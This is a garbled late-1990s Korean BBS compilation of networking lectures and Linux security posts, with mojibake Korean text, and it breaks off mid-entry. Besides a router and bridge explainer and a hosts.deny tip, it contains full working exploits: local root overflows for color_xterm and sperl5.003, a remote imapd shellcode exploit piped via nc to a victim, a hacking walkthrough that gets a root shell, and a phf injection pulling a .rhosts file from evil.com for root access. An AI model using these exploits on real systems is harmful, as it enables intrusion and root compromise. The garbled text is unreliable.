Á¦ ¸ñ: [°­ÁÂ] °ÔÀÌÆ®¿þÀÌ , ¶ó¿ìÅÍ , ºê¸´Áö¶õ? °ÔÀÌÆ®¿þÀÌ(Gateway)´Â ÀϹÝÀûÀ¸·Î ÇϳªÀÇ ³×Æ®¿öÅ©, ȤÀº ¿ïŸ¸® ¾È¿¡¼­ ¹ÛÀ¸·Î ºüÁ®³ª°¡´Â Áß°£ °ü¹®¿ªÇÒÀ» ¼öÇàÇÏ´Â °ÍÀ» Gateway¶ó°í ÇÕ´Ï´Ù. ÀϹÝÀûÀ¸·Î À̾߱âÇÒ¶§, ¶ó¿ìÅÍ(Router)¿Í °ÔÀÌÆ®¿þÀÌ´Â °°Àº Àǹ̷Π»ý°¢ÇÏ½Ã¸é ¹®Á¦°¡ ¾øÀ» °ÍÀÔ´Ï´Ù. ÇÏÁö¸¸, °ÔÀÌÆ®¿þÀÌ°¡ ´Ù¸¥ Àǹ̷Π»ç¿ëµÉ ¼öµµ ÀÖ½À´Ï´Ù. ¿¹¸¦ µé¸é, WWW¿¡¼­ CGI(Common Gateway Interface)°°Àº °ÍÀº °ÔÀÌÆ®¿þÀÌÀÇ Àǹ̰¡ ¶ó¿ìÅͶû ´Ù¸£Áö¿ä. http daemonÀÌ ÀÎÀÚ¸¦ ¹Þ¾Æ ¾î¶² ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄÑ ±× °á°ú°ªÀ» »ç¿ëÇÏ¿© client¿¡ ´Ù½Ã htmlÇüÅ·ΠÀڷḦ ÀüÇØÁÖ´ ÇÏ¿©°£, 'ÀϹÝÀû'ÀÎ °æ¿ì¿¡, Router¿Í Gateway´Â °°Àº Àǹ̷Π»ç¿ëµË´Ï´Ù. ºê¸´Áö(Bridge)´Â ¹«¾ùÀ̳ĸé¿ä. Router¿Í ºñ½ÁÇÏ°Ô, packetÀ» filtering, forwardingÇØ ÁÖ´Â ¿ªÇÒÀ» ¼öÇàÇÏ´Â Network ÀåºñÀÔ´Ï´Ù. Router¿Í ¹«¾ùÀÌ ´Ù¸£³Ä°í¿ä? Bridge´Â Ethernet Address(LANÄ«µå ROM¿¡ ¹ÚÇôÀÖ´Â °íÀ¯³Ñ¹ö)·Î packetÀ» filteringÇÕ´Ï´Ù. Router´Â IP address·Î packetÀ» filtering, forwardingÇÕ´Ï´Ù. ÀÌ°Ô ¹«½¼ Àǹ̳Ä? A¶ó´Â LAN°ú B¶ó´Â LANÀÌ ºê¸´Áö·Î ¿¬°áµÇ¾î ÀÖ´Ù°í °¡Á¤ÇÕ´Ï´Ù. Ethernet¿¡¼­ A¶ó´Â LAN¾È¿¡ ÀÖ´Â ÇÑ È£½ºÆ®°¡ °°Àº LAN¾ÈÀÇ È£½ºÆ®¿¡°Ô packetÀ» º¸³À´Ï´Ù. ±×·¯¸é, ÀÌ ÆÐŶÀº B¶ó´Â LANÀ¸·Î Àü´ÞµÉ±î¿ä? ±×·¸Áö ¾Ê½À´Ï´Ù. EthernetÀº ¹æ¼Û(broadcasting)¹æ½ÄÀ¸·Î packetÀ» º¸³»¹Ç·Î A·£¾ÈÀÇ ºê¸´Áö¸¦ Æ÷ÇÔÇÑ ¸ðµç È£½ºÆ®°¡ °°Àº ÆÐŶÀ» ¹Þ¾Æº¸Áö¸¸, ºê¸´Áö´Â A·£ ¾ÈÀÇ È£½ºÆ®°¡ A·£ ¾ÈÀÇ È£½ºÆ®·Î packetÀ» º¸³»´Â °ÍÀ̹ǷΠB·£ÂÊÀ¸·Î´Â packetÀ» broadcastingÇÏÁö ¾Ê½À´Ï´Ù. ¸¸ÀÏ, A·£¾ÈÀÇ È£½ºÆ®¿¡¼­ packetÀ» B·£¾ÈÀÇ È£½ºÆ®·Î º¸³½´Ù¸é, ¸ÕÀú È£½ºÆ®´Â A·£¾ÈÀ¸·Î packetÀ» broadcastingÇÕ´Ï´Ù. A·£¾È¿¡´Â packetÀÇ ¸ñÀûÁö°¡ ¾øÁö¿ä. ÇÏÁö¸¸, ÀÌ ÆÐŶÀ» ¹Þ¾Æº» ºê¸´Áö´Â ÀÌ°É BÂÊÀ¸·Î broadcastingÇÏ´Â °Ì´Ï´Ù. ±×·³, ÆÐŶÀÌ Àü´ÞµÇ°ÚÁÒ. ±×·¯±â À§Çؼ­´Â Bridge´Â µÎ°³ ÀÌ»óÀÇ Network Interface¸¦ °¡Á®¾ß ÇÏ°í¿ä (¾çÂÊ ·£À¸·Î Çϳª¾¿ÀÇ Interface°¡ ÀÖ¾î¾ß ÇÏ°ÚÁö¿ä) ¾çÂÊ LAN¾ÈÀÇ Ethernet Address¿¡ ´ëÇÑ Á¤º¸¸¦ ¸ðµÎ °¡Áö°í ÀÖ¾î¾ß ÇÕ´Ï´Ù. LANÀ¸·Î ¿¬°áÇϸé ÀÚµ¿À¸·Î bridge¿¡¼­ À̸¦ °¨ÁöÇؼ­ Á¤º¸ tableÀ» ¸¸µéÁö¿ä. ºê¸´Áö(Bridge)¸¦ »ç¿ëÇÏ´Â ¸ñÀûÀº segment¸¦ ºÐ¸®Çϱâ À§ÇØ »ç¿ëµË´Ï´Ù. Ethernet¹æ½ÄÀÇ ¾àÁ¡Àº broadcasting¹æ½Ä ¶§¹®¿¡ ÇϳªÀÇ LAN¾È¿¡ ³Ê¹« ¸¹Àº È£½ºÆ®°¡ ¹°·ÁÀÖ´Ù¸é, ¼º´ÉÀÌ ÀúÇϵDZ⠶§¹®ÀÔ´Ï´Ù. ±×·¯¹Ç·Î, ÇϳªÀÇ ·£À» µÎ°³ ÀÌ»óÀ¸·Î ÂÉ°¶¶§, Áï, Bridge¸¦ µÎ¾î °°Àº ·£¾ÈÀÇ packetÀº ¹Ù±ùÀ¸·Î ³ª°¡Áö ¸øÇÏ°Ô Çϸé ÀÌ·± ´ÜÁ¡À» ±Øº¹ÇÒ ¼ö ÀÖ½À´Ï´Ù. Router´Â Bridge¿Í µ¿ÀÛ¿ø¸®°¡ °°½À´Ï´Ù. ´Ü, packetÀ» ¹«¾ùÀ¸·Î filtering/forwardingÇÏ´À³Ä°¡ ´Ù¸¨´Ï´Ù. ÀϹÝÀûÀÎ router´Â bridge ±â´ÉÀ» °âÇÏ°í ÀÖ½À´Ï´Ù. ±×·¡¼­, ºê¶ó¿ìÅÍ(brouter)¶ó°í ºÎ¸£±âµµ ÇÏÁö¿ä. ±×¸²À» ±×·Á¼­ Á»´õ ÀÚ¼¼È÷ ¼³¸íÇϸé ÁÁÀ¸·Ã¸¸.... È÷È÷, ´õÀÌ»ó ¸»ÇÏ¸é ¾ø´Â ½Ç·ÂÀÌ µéÅ볪°ÚÁö¿ä? :-P ¸¶Áö¸·À¸·Î ÇѸ¶µð ´õ, EthernetÀº ISO 802À§¿øȸ¿¡¼­ Á¦Á¤ÇÑ 802.2¹æ½Ä (CSMA/CD, Carrier Sense Multiple Access with Collision Detection) À» »ç¿ëÇÕ´Ï´Ù. ±Ã±ÝÇÏ½Ã¸é ¾Æ¹«°Å³ª Åë½ÅÃ¥À» º¸½Ã¸é Ä£ÀýÇÏ°í ÀÚ¼¼ÇÑ ¼³¸íÀÌ ³ª¿ÍÀÖÀ» °Ì´Ï´Ù. Á¦ ¸ñ: [°­ÁÂ] ÇØÅ·ÇÏ´Â ¹æ¹ý ÀÌ °­Á´ ¾ÆÁÖ À§ÇèÇÑ °­Á°¡ µÉ ¼öµµ ÀÖ½À´Ï´Ù. ÀÌ °­Á¸¦ Àß ÀÌ¿ëÇÏ¸é ³ª¿ì´©¸®°èÁ¤ ¼­ºñ½º¸¦ ÇØÅ· ÇÒ ¼öµµ ÀÖ´Â ½Ç·ÂÀÚ(?)°¡ µÇÁÒ.. ¼ÓÀÌ ºó °Ñ¸¸ È­·ÁÇÑ ½Ç·ÂÀÚ¿ä. Àý´ë·Î ÀÌ°ÍÀ» ±×´ë·Î Èä³»¸¸ ³»º¸°í ±×°Í¿¡¼­ ¸ØÃß¼¼¿ä. ´õ °øºÎ¸¦ ÇÑÈÄ¿¡ º»°ÝÀûÀ¸·Î ÇϽðí.. ±×·³ °­Á ¿Ã¶ó °©´Ï´Ù. Âü°í·Î °ú°Å¿¡ ÇØÅ·»ç°ÇÀ¸·Î ¶°µé¼®ÇÑ ÇØÅ·Àº ¸ðµÎ ÀÌ·± Á¾·ùÀÇ ÇØÅ·ÀÔ´Ï´Ù. Ãʺ¸ÀûÀÎ ¼öÁØÀÌÁö¿ä. ±×·³.. ÇØÅ·ÇÏ´Â »ç¶÷µéÀÇ ´ëºÎºÐÀº ÀÌ·± ½ÄÀ¸·Î ÇÑ´ä´Ï´Ù. ¾ÆÁÖ º¸ÆíÀûÀÎ °ÍÀÌÁÒ.. ¹Ù·Î ¼Ò½º Äڵ带 ÇØ´ç È£½ºÆ®(ÇØÅ·´ë»ó)¿¡¼­ ÄÄÆÄÀÏ ÇÑÈÄ ½ÇÇà½ÃÅ°¸é ³¡³ª´Â °ÅÁÒ.. ¾ÆÁÖ ½±´Ù±¸¿ä? ±×·³ ±× °úÁ¤À» Çѹø Çغ¼±î¿ä? [ ½ÃÀÛ ] [root@loveyou lib]# telnet bbs.xxx.xx.xx Trying 20.23.10.3... Connected to xxxxxx.xx.kr. Escape character is '^]'. Welecom My host~ ## 01:17 on Monday, 30 March 1998 (ttyp5) login: loveyou Password: Last login: Mon Mar 30 00:50:04 from loveyou [loveyou@bbs loveyou]$ ls -al /usr/bin/sperl* -rwsr-xr-x 2 root root 402280 Apr 22 1997 /usr/bin/sperl5.003 /* ÇØÅ·ÇÒ ´ë»óÀ» ã½À´Ï´Ù. ´ëºÎºÐÀÌ setuid °¡ °É¸° ÇÁ·Î±×·¥À» ãÀ½ º¸¼¼¿ä. rws ¶ó°í setuid°¡ ¼³Á¤µÇ¾úÁÒ? ±×·±ÈÄ¿¡ ÇØ´ç ÇØÅ· ÇÁ·Î±×·¥À» °¡Á®¿Í¼­ ÄÄÆÄÀÏÀ» ÇÕ´Ï´Ù. º¸ÅëÀº ftp ·Î ±× ¼Ò½º¸¦ °¡Á® ¿É´Ï´Ù. */ [loveyou@bbs loveyou]$ ftp loveyou.ml.org Connected to loveyou.ml.org. 220 xxxxxxxx.xx.xx.xr FTP server (Version wu-2.4.2-academ[BETA-xx](1) Sat xxx xx xx:xx:xx KST 199x) ready. Name (xxxxx:loveyou): loveyou 331 Password required for loveyou Password: 230 User shade logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> get hack.c local: hack.c remote: hack.c 200 PORT command successful. 150 Opening BINARY mode data connection for hack.c (4037 bytes). 226 Transfer complete. 4037 bytes received in 1.57 secs (2.5 Kbytes/sec) ftp> quit [loveyou@bbs loveyou]$ cc -o hack hack.c /* ¼Ò½º¸¦ ÄÄÆÄÀÏ ÇÑ´Ù. hack À̶ó´Â ÇÁ·Î±×·¥ »ý¼º */ [loveyou@bbs loveyou]$ ./hack Using address: 0x45c # <- root ÇÁ·ÒÇÁÆ® Áö¿ä? ÀÌ·¸°Ô µÇ¸é ¼º°øÀÌ¿¡¿ä ÇØÅ· Çϱ⠳ʹ« ½¬¿ö¿ä.±×·¸Áö ¾ÊÀº°¡¿ä? ÇÏÁö¸¸ ÀÌ·¸°Ô ½¬¿î ÇØÅ·Àº ¹Ì¿¬¿¡ °ü¸®ÀÚµéÀÌ ¹æÁöÇÒ ¼ö ÀÖÁö¿ä.. °ü¸®ÀÚ´Â µÎ°¡Áö ÇൿÀ» ÇÒ ¼ö ÀÖ½À´Ï´Ù. ù¹ø°, ¿ì¼± ¸·¾ÆµÐ´Ù. chmod 700 /usr/bin/sperl* µÎ¹ø°, ±× ´ÙÀ½Àº ftp ·Î °¢ ÇØ´ç ¸®´ª½º »çÀÌÆ®³ª ¼ÒÇÁÆ®¿þ¾î »çÀÌÆ®·Î °¡¼­ ÆÐÄ¡ ÆÄÀÏÀ» °¡Á®¿Í¼­ ÆÐÄ¡ÇÑ´Ù. ¾î¶»°Ô ÇÒÁö ¸ð¸¥´Ù¸é ±×³É ù¹ø°¸¸ Çسõ°í À־ µÇ°í ·¯ºêÀ¯¿¡°Ô ÀÚ¹®À» ±¸Çصµ µÈ´Ù. ^_^ ¿©±â±îÁö¿¡¿ä. Àç¹ÌÀÖÁö¿ä? ÀÌ·±°ÍÀÌ ÇØÅ·ÀÌ¿¡¿ä. °ú°Å¿¡ ³ª¿ì´©¸® °èÁ¤ ¼­¹ö ÇØÅ·Çؼ­ ³­¸®³µ´ø °íµîÇлýÀº ÀÌ·± ÇØÅ·À̾úÁÒ. ³Ê¹« °£´ÜÇÏÁÒ? ÇØÅ·À̶ó´Â °Ç ÀÌÁ¤µµ°¡Áö°í º¼ ¼ö°¡ ¾ø¾î¿ä. ¾ÆÁÖ ÀϺκп¡ ºÒ°úÇϴϱî¿ä ÇÏÁö¸¸ ÀÌ·± °ÍÀ» ¼º°øÇß´Ù°í ¿ìÂá´ë´Â »ç¶÷µéÀÌ ¸¹¾Æ¼­ Á» ±×·¸³×¿ä. Á¦ ¸ñ: [°­ÁÂ] ¿ÜºÎ ƯÁ¤ È£½ºÆ®ÀÇ Á¢±Ù ¸·±â À½..¾î¶² È£½ºÆ®¿¡¼­ ÀÚ²Ù ÀÌ»óÇÑ »ç¶÷ÀÌ µé¾î¿Â´Ù°í ´À³¥¶© ±× È£½ºÆ®ÀÇ »ç¶÷¸¸ ¸øµé¾î¿À°Ô ÇÏ°í ½Í´Ù±¸¿ä? ±×·¸´Ù¸é ¹æ¹ýÀÌ ÀÖÁÒ. ¹Ù·Î À¯´Ð½º,¸®´ª½º¶ó¸é ±âº»ÀûÀ¸·Î ¼³Ä¡µÇ¾î ÀÖ´Â TCP ¿ÍÆÛ¸¦ ÀÌ¿ëÇÏ´Â °Ì´Ï´Ù. ¾Æ~ À¢Áö °ÅâÇÏ´Ù±¸¿©? µû¾Ç 2ÁÙ¸¸ ¾²¸é µË´Ï´Ù.ÇÏÇÏ /etc/hosts.deny ¶ó´Â ÆÄÀÏÀÌÁÒ.. ±× ÆÄÀϾȿ¡ ÇÁ·ÎÅäÄÝ:È£½ºÆ®³×ÀÓ ÀÌ·± Çü½ÄÀ¸·Î ¾²¸é µË´Ï´Ù. ±× ¿¹¸¦ µé¸é ALL:soback.kornet.nm.kr À̶ó´Â ³»¿ëÀº soback.kornet.nm.kr ¿¡¼­ ¿À´Â ¸ðµç ÇÁ·ÎÅäÄÝÀÇ Á¢¼ÓÀ» ±ÝÁö ÇÑ´Ù´Â ¸»ÀÔ´Ï´Ù. Èå..À¯¿ëÇÏÁÒ? /etc/hosts.allow ¶ó´Â ÆÄÀÏÀº ƯÁ¤ È£½ºÆ®ÀÇ Á¢¼ÓÀ» Çã°¡ ÇÒ¶§ ÇÏÁÒ. ±×·¯´Ï±ñ À½ À§ÀÇ /etc/hosts.denyº¸´Ü »óÀ§ÀÇ ºñÁßÀ» Â÷Áö ÇÕ´Ï´Ù. Á¦ ¸ñ: [º¸¾È] ¸®´ª½º xterm,color_xterm ¸í·É xrm (color_xterm, xterm, nxterm) ½Ã½ºÅÛ Linux Slackware 3.1, RedHat 4.2 ¹®Á¦Á¡ ¹öÆÛ ¿À¹ö Ç÷ο츦 ÀÏÀ¸Å²´Ù. >-- cx.c --< /* * color_xterm buffer overflow exploit for Linux with * non-executable stack * Copyright (c) 1997 by Solar Designer * * ÄÄÆÄÀÏ ¹æ¹ý: * gcc cx.c -o cx -L/usr/X11/lib \ * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//` * * ½ÇÇà : * $ ./cx * system() found at: 401553b0 * "/bin/sh" found at: 401bfa3d * bash# exit (^^;) * Segmentation fault */ #include #include #include #include #include #include #include #include #include #define SIZE1 1200 /* Amount of data to overflow with */ #define ALIGNMENT1 0 /* 0..3 */ #define OFFSET 22000 /* Structure array offset */ #define SIZE2 16000 /* Structure array size */ #define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */ #define SIZE3 SIZE2 #define ALIGNMENT3 (ALIGNMENT2 & 3) #define ADDR_MASK 0xFF000000 char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2]; int *ptr; int pid, pc, shell, step; int started = 0; jmp_buf env; void handler() { started++; } /* SIGSEGV handler, to search in libc */ void fault() { if (step < 0) { /* Change the search direction */ longjmp(env, 1); } else { /* The search failed in both directions */ puts("\"/bin/sh\" not found, bad luck"); exit(1); } } void error(char *fn) { perror(fn); if (pid > 0) kill(pid, SIGKILL); exit(1); } int nz(int value) { if (!(value & 0xFF)) value |= 8; if (!(value & 0xFF00)) value |= 0x100; return value; } void main() { /* * A portable way to get the stack pointer value; why do other exploits use * an assembly instruction here?! */ int sp = (int)&sp; signal(SIGUSR1, handler); /* Create a child process to trace */ if ((pid = fork()) < 0) error("fork"); if (!pid) { /* Send the parent a signal, so it starts tracing */ kill(getppid(), SIGUSR1); /* A loop since the parent may not start tracing immediately */ while (1) system(""); } /* Wait until the child tells us the next library call will be system() */ while (!started); if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH"); /* Single step the child until it gets out of system() */ do { waitpid(pid, NULL, WUNTRACED); pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); if (pc == -1) error("PTRACE_PEEKUSR"); if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK)); /* Single step the child until it calls system() again */ do { waitpid(pid, NULL, WUNTRACED); pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); if (pc == -1) error("PTRACE_PEEKUSR"); if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK)); /* Kill the child, we don't need it any more */ if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL"); pid = 0; printf("system() found at: %08x\n", pc); /* Let's hope there's an extra NOP if system() is 256 byte aligned */ if (!(pc & 0xFF)) if (*(unsigned char *)--pc != 0x90) pc = 0; /* There's no easy workaround for these (except for using another function) */ if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) { puts("Zero bytes in address, bad luck"); exit(1); } /* * Search for a "/bin/sh" in libc until we find a copy with no zero bytes * in its address. To avoid specifying the actual address that libc is * mmap()ed to we search from the address of system() in both directions * until a SIGSEGV is generated. */ if (setjmp(env)) step = 1; else step = -1; shell = pc; signal(SIGSEGV, fault); do while (memcmp((void *)shell, "/bin/sh", 8)) shell += step; while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000)); signal(SIGSEGV, SIG_DFL); printf("\"/bin/sh\" found at: %08x\n", shell); /* buf1 (which we overflow with) is filled with pointers to buf2 */ memset(buf1, 'x', ALIGNMENT1); ptr = (int *)(buf1 + ALIGNMENT1); while ((char *)ptr < buf1 + SIZE1 - sizeof(int)) *ptr++ = nz(sp - OFFSET); /* db */ buf1[SIZE1 - 1] = 0; /* buf2 is filled with pointers to "/bin/sh" and to buf3 */ memset(buf2, 'x', SIZE2 + SIZE3); ptr = (int *)(buf2 + ALIGNMENT2); while ((char *)ptr < buf2 + SIZE2) { *ptr++ = shell; /* db->mbstate */ *ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */ } /* buf3 is filled with pointers to system() */ ptr = (int *)(buf3 + ALIGNMENT3); while ((char *)ptr < buf3 + SIZE3 - sizeof(int)) *ptr++ = pc; /* db->methods->mbfinish */ buf3[SIZE3 - 1] = 0; /* Put buf2 and buf3 on the stack */ setenv("BUFFER", buf2, 1); /* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */ execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL); error("execl"); } >-- cx.c --< ÇØ°áÃ¥ ¾Æ·¡¿¡¼­ ÆÐÄ¡¹öÁ¯À» ã¾Æ¼­ ÆÐÄ¡ÇÑ´Ù. http://www.false.com/security/linux-stack/3:50 (17ÁÙ) Á¦ ¸ñ: [º¸¾È] ¸®´ª½º Ghostscript ¸í·É Ghostscript ½Ã½ºÅÛ Linux systems running Ghostscript 1.4 ¹®Á¦Á¡ °í½ºÆ® ½ºÅ©¸³ÀÇ ¹®Á¦Á¡Àº ¾î¶² ¼û°ÜÁø Äڵ带 ÀÌ¿ëÇؼ­ ±×°ÍÀ» ÀÌ¿ëÇØ Àá½Ã ½©À» ÅëÇؼ­ ¾î¶²ÀÏÀ» ÇÒ ¼ö ÀÖ´Ù. ±× ÄÚµå´Â Æ÷½ºÆ® ½ºÅ©¸³Æ®ÀÇ ¼û°ÜÁø ºñ¹Ð ÄÚµåÀÏ °ÍÀÌ´Ù. ·çÆ®ÀÇ ¸í·ÉÀ» ³»¸± ¼ö ÀÕ´Ù. ¹®Á¦Á¡ 1.4 ÀÌÈÄÀÇ °í½ºÆ® ½ºÅ©¸³Æ®¸¦ ±ò¾Æ¶ó.. --------------------------- ¹ø È£: 114/177 µî·ÏÀÚ: ±è¿ëÁØ(·¯ºêÀ¯) 98/02/16 23:52 (89ÁÙ) Á¦ ¸ñ: [º¸¾È] ¸®´ª½º imapd ¸í·É imapd ½Ã½ºÅÛ RedHat 4.0¹öÁ¯ ±îÁö Slackware 3.2 ¹®Á¦Á¡ imapdµ¥¸óÀ» ÀÌ¿ëÇؼ­ ¸®¸ðÆ® Á¢¼Ó ÀÚ°¡ ·çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù. ÀÌ´Â ¸Å¿ì À§ÇèÇϸç...·çÆ®Æнº¿öµå Á¶Â÷ ¹Ù²Ü ¼ö ÀÖ´Ù. /* * IMAPd Linux/intel remote xploit by savage@apostols.org * 1997-April-05 * Workz fine against RedHat and imapd distributed with pine * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the * rest of ToXyn !!! * usage: * $ (imap 0; cat) | nc victim 143 * | * +--> usually from -1000 to 1000 ( try in steps of 100 ) * [ I try 0, 100 and 200 - so1o ] */ #include char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; char username[1024+255]; void main(int argc, char *argv[]) { int i,a; long val; if(argc>1) a=atoi(argv[1]); else a=0; strcpy(username,shell); for(i=strlen(username);i> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username); } ÇØ°áÃ¥ ·¡µåÇÞ 4.0 »ç¿ëÀÚ´Â 4.1·Î ¹Ù²Ù¸é ÆÐÄ¡µÈ´Ù. ·¡µåÇÞ 2.0 »ç¿ëÀÚ´Â rpm -e imap¸¦ ½ÇÇà½ÃÄѼ­ ¾ø¾Ö¶ó ftp.redhat.com ¿¡ °¡¸é ÆÐÄ¡µÈ°ÍÀÌ ÀÖÀ¸´Ï ¹Þ¾Æ¼­ ÆÐÄ¡Ç϶ó Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ircd ¸í·É ircd ½Ã½ºÅÛ Debian Linux(1.3.1) ¹®Á¦Á¡ IRC¼­¹öÀÇ ÆÐÅ°ÁöÀÎ ircd 2.9.32-3 Àº µ¥ºñ¾È 1.3.1¿¡ Æ÷ÇԵǾî ÀÖ´Ù. ù°·Î ¹®Á¦Á¡Àº /etc/ircd/ ¸¦ ÀÐÀ»¼ö ÀÖ´Ù. ÀÌ µð·ºÅ丮¿¡ Æ÷ÇÔµÈ ¼­¹ö ¼³Á¤ ÆÄÀÏ°ú irc ¼³Á¤ÀÚÀÇ Æнº¿öµå Á¶Â÷ ÀÐÀ» ¼ö ÀÖµµ·Ï Æ۹̼ÇÀÌ ¿­·ÁÀÖ´Ù. µÑ°·Î ÆÐÅ°Áö¸¦ ¼³Ä¡Çϸé /etc/inetd.conf¿¡ ÀÌ·± ÇÑÁÙÀÌ ¼³Á¤µÈ´Ù. ircd stream tcp wait root /usr/sbin/ircd ircd -i ------ À§¿¡¼­ º¸µíÀÌ root ¶ó°í µÇ¾î ÀÖ´Â ºÎºÐÀ» irc ¶ó°í °íÃĶó.. ·çÆ®´Â °³¿©ÇÏÁö ¾Ê´Â°ÍÀÌ ¿øÄ¢ÀÌ´Ù. ÇØ°áÃ¥ Loveyou~# chmod 700 /etc/ircd/ Loveyou~# chown irc.irc /etc/ircd/ Loveyou~# grep ircd /etc/inetd.conf ircd stream tcp wait irc /usr/sbin/ircd ircd -i À§Ã³·³ irc ¶ó°í °íÃÄÁ®¾ß ÇÑ´Ù. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º rcp (¸®¸ðÆ®) ¸í·É /usr/bin/rcp ½Ã½ºÅÛ Red Hat 4.0 (if user nobody has UID 65535 and Slackware 3.1 (possibly others) ¹®Á¦Á¡ nobodyÀÇ uid°¡ 65535À϶§ /usr/bin/rcpÀÇ ¹®Á¦Á¡ÀÌ ³ªÅ¸³­´Ù. »ó´ë¹æÀÇ ¼­¹ö°¡ NCSA httpd ¼­¹ö¸¦ ¾´´Ù¸éÀº ´ÙÀ½°ú °°Àº ÀÏÀ» ¹úÀÏ ¼ö°¡ ÀÖ´Ù. root[11:20][504]~# su - nobody [nobody@slip-70-8 /]$ id uid=65535(nobody) gid=65535 [nobody@slip-70-8 /]$ rcp oberheim@moe.cc.utexas.edu:brb /tmp/test [nobody@slip-70-8 /]$ ls -la /tmp/test -rw------- 1 root 65535 0 Jan 29 11:20 /tmp/test $ echo "+ +" > /tmp/my.rhosts $ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+ /root/.rhosts" | nc -v - 20 victim.com 80 $ rsh -l root victim.com "/bin/sh -i" # ÇØ°áÃ¥ nobodyÀÇ UID¸¦ 99 ·Î Çصξî¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º perl 5.003 ¸í·É sperl5.003 Àû¿ëµÇ´Â È£½ºÆ® Linux Slackware 3.1, 3.2 ·¡µåÇÞ ¸®´ª½º ¹®Á¦Á¡ sperl5.003 À̶ó´Â ÆÄÀÏÀ» ¹öÆÛ ¿À¹öÇ÷ο츦 ½Ãų¼ö ÀÖ´Ù. #include #define DEFAULT_OFFSET 640 #define DEFAULT_BUFFER_SIZE 1600 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL); } ÇØ°á sperl5.003 ÀÇ suid bit¸¦ ¾ø¾Ö¶ó. ¾Æ´Ï¸é 5.003_97f ÀÇ ¹öÁ¯À¸·Î ¹Ù²Ù¾î¶ó. --------------------------- Á¦ ¸ñ: [º¸¾È] ¸®´ª½º sysctl() ¸í·É sysctl() Àû¿ëµÇ´Â ½Ã½ºÅÛ Linux prior to 2.0.31 ¹®Á¦Á¡ sysctl()À̶ó´Â ÇÔ¼ö¿¡ ¹®Á¦°¡ 